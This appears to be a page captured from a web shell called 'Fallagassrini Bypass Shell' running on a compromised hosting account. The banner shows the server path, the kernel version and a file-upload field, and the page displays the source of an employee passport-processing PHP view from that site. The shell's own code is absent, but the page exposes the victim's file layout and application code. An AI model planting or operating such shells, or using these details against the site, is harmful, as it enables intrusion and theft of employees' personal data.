? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/www/savoyglobal.net/sgms/application/views/Administration/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/www/savoyglobal.net/sgms/application/views/Administration/edit_passport_processing.php

<?php
if ( ! defined('BASEPATH')) exit('No direct script access allowed');
$this->load->view('documentreadyfunctions');
?>



<div class="select-bar">
    <label><img src="<?=base_url()?>assets/images/backbutton.png" title="Back" class="clickimage" onclick="viewdata('administration','viewinadministrationsearch','search_passport_processing','view_passport_processing','<?=$_SESSION['pagenum'];?>')" alt="Back" align = "center" width="25" height="25"  />
    </label>
    <span class="heading">Update Details</span>
</div>

<fieldset>
    <?php
        $attributes=array('id'=>'validateform','class'=>'customForm');
        echo form_open('administration/addinadministration/update_passport_processing/view_passport_processing/1',$attributes);
        $employee = $this->administrationmodel->get_emp_info($viewinfo->employee_id);
        if($employee->emp_non_no[0]==',')
        {
            $employee->emp_non_no=substr($employee->emp_non_no, 1);
        }
        $emp_non_no = str_replace(',',', ', $employee->emp_non_no);
        $passport_details = $this->mastermodel->get_data('passport_processing',$viewinfo->emp_non_id,'employee_id');
    ?>
    <ul>
         <li>
            <label for="data">Employee Name</label>
            <div class="record_entry">
                    <?php
                        echo $employee->emp_non_full_name;
                    ?>
                    <input type="hidden" name="employee_id" value="<?=$viewinfo->employee_id;?>"/>
                    <input type="hidden" name="passport_processing_id" value="<?=$viewinfo->passport_processing_id;?>"/>
            </div>
         </li>
          <li>
            <label for="data">Employee No</label>
                <div class="record_entry">
                    <?php
                        echo $emp_non_no;
                    ?>

                </div>
         </li>
         <li>
            <label for="data">Joining Date</label>
                <div class="record_entry">
                    <?php
                        echo $employee->emp_non_date_joining;
                    ?>

                </div>
         </li>
         <li>
            <label for="data">Trade</label>
                <div class="record_entry">
                    <?php
                        echo $employee->trade_name;
                    ?>

                </div>
         </li>

         <li>
            <label for="data">Camp</label>
                <div class="record_entry">
                    <?php
                        echo $this->mastermodel->get_employee_current_camp($viewinfo->employee_id);
                    ?>
                </div>
         </li>
         <li>
            <label for="data">Site</label>
                <div class="record_entry">
                    <?php
                        echo $this->mastermodel->get_employee_current_site($viewinfo->employee_id);
                    ?>
                </div>
         </li>


          <li>
            <label for="data">Visa Type</label>
                <div class="record_entry">
                    <?php
                        echo $this->mastermodel->getSingleFieldValue('visa_type','visa_type_name','visa_type_id',$employee->emp_non_visa_type_id);
                    ?>
                </div>
         </li>

         <li>
            <label for="data">Sponsor</label>
                <div class="record_entry">
                    <?php
                        echo $this->mastermodel->getSingleFieldValue('sponsor','sponsor_name','sponsor_id',$employee->emp_non_sponsor_id);
                    ?>
                </div>
         </li>
         <li>
            <table class="sort">

                 <caption>Passport Details</caption>
                 <tr>
                     <th align="center">Passport No</th>
                     <th align="center">Issue Date</th>
                     <th align="center">Expiry Date</th>
                     <th align="center">Remind Before (in days)</th>
                 </tr>
                    <?php
                    $i=1;
                        foreach($passport_details as $passport)
                        {

                    ?>
                 <tr>

                     <td>
                         <?php
                              echo $passport['passport_no'];

                         ?>
                     </td>
                     <td>

                             <?php
                                  echo $this->mastermodel->convertdatenormalformat($passport['passport_issue_date']);
                                  ?>

                     </td>
                     <td>

                             <?php
                                  echo $this->mastermodel->convertdatenormalformat($passport['passport_expiry_date']);
                                  ?>

                     </td>
                     <td>
                         <?=$passport['passport_remind_before'];?>
                     </td>

                  </tr>
                  <?php
                        }
                        ?>
            </table>
        </li>
          <li>
           <table class="sort">
                 <tr>
                     <th align="center">Passport No</th>
                     <th align="center" style="width:200px;">Issue Date</th>
                     <th align="center" style="width:200px;">Expiry Date</th>
                     <th align="center">Remind Before (in days)</th>
                 </tr>
                 <tr>
                     <td>
                         <?php
                              $data = array(
                              'name'        => 'passport_no',
                              'id'          => 'passport_no',
                              'class'       => 'required',
                              'value'       => $viewinfo->passport_no
                              );
                              echo form_input($data).form_error($data);

                         ?>
                     </td>
                      <td>
                         <div id="multi">
                             <input class="required" type="text" name="passport_issue_date" value="<?=$this->mastermodel->convertdatenormalformat($viewinfo->passport_issue_date);?>" id="passport_issue_date" style="width:100px;"/>
                            <img src="<?=base_url()?>assets/images/icons/calendar.png"  alt="Click to popup the clendar!" />
                        </div>
                     </td>
                     <td>
                         <div id="multi">
                            <input type="text" class="required" name="passport_expiry_date" id="passport_expiry_date" value="<?=$this->mastermodel->convertdatenormalformat($viewinfo->passport_expiry_date);?>" style="width:100px;"/>
                            <img src="<?=base_url()?>assets/images/icons/calendar.png"  alt="Click to popup the clendar!" />
                        </div>
                     </td>
                     <td>
                         <input type="text" name="passport_remind_before" class="number" id="passport_remind_before" value="<?=$viewinfo->passport_remind_before;?>"  style="width:30px;"/>
                     </td>

                  </tr>
            </table>
        </li>


        
         <li>
            <input type="hidden" name="tab_name" value="employee_passport_processing"/>
            <input type="hidden" name="resfunction" value="search_employee_passport_processing"/>
        </li>
        <li>
            <label for="submit">&nbsp;</label>
            <button type="submit" class="clickimage" onclick="addformdata('validateform')">Save</button>
        </li>
        
    </ul>
<?php echo form_close();?>
</fieldset>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net